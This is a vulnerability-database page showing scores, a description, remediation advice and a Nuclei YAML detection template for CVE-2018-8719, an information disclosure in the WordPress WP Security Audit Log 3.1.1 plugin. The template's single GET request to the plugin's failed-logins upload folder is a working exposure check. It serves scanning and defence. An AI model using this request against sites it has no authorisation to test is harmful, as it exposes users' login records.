Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-8719
HistoryAug 27, 2021 - 6:40 p.m.

WordPress WP Security Audit Log 3.1.1 - Information Disclosure

2021-08-2718:40:18
ProjectDiscovery
github.com
10

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

5 Medium

AI Score

Confidence

High

0.032 Low

EPSS

Percentile

91.2%

WordPress WP Security Audit Log 3.1.1 plugin is susceptible to information disclosure. Access to wp-content/uploads/wp-security-audit-log/* files is not restricted. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations.
id: CVE-2018-8719

info:
  name: WordPress WP Security Audit Log 3.1.1 - Information Disclosure
  author: LogicalHunter
  severity: medium
  description: |
    WordPress WP Security Audit Log 3.1.1 plugin is susceptible to information disclosure. Access to wp-content/uploads/wp-security-audit-log/* files is not restricted. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    An attacker can exploit this vulnerability to gain sensitive information from the WordPress WP Security Audit Log plugin.
  remediation: |
    Update to the latest version of WordPress WP Security Audit Log plugin (3.1.2 or higher) to fix the information disclosure vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/44371
    - https://vuldb.com/?id.115817
    - https://www.exploit-db.com/exploits/44371/
    - https://nvd.nist.gov/vuln/detail/CVE-2018-8719
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2018-8719
    cwe-id: CWE-532
    epss-score: 0.03177
    epss-percentile: 0.91151
    cpe: cpe:2.3:a:wpsecurityauditlog:wp_security_audit_log:3.1.1:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: wpsecurityauditlog
    product: wp_security_audit_log
    framework: wordpress
  tags: cve,cve2018,exposure,edb,wordpress,wp-plugin,wpsecurityauditlog

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/uploads/wp-security-audit-log/failed-logins/"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "[TXT]"
          - ".log"
          - "Index of"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100cff403ec1d7c36ecd087e8a3ba798a05ec77bfa1764aa2b89e571033cee6695302203bf9a256c6c4dec931e05a4c519c00c937217f97ab2aeccbf09f12ec9344c59a:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

5 Medium

AI Score

Confidence

High

0.032 Low

EPSS

Percentile

91.2%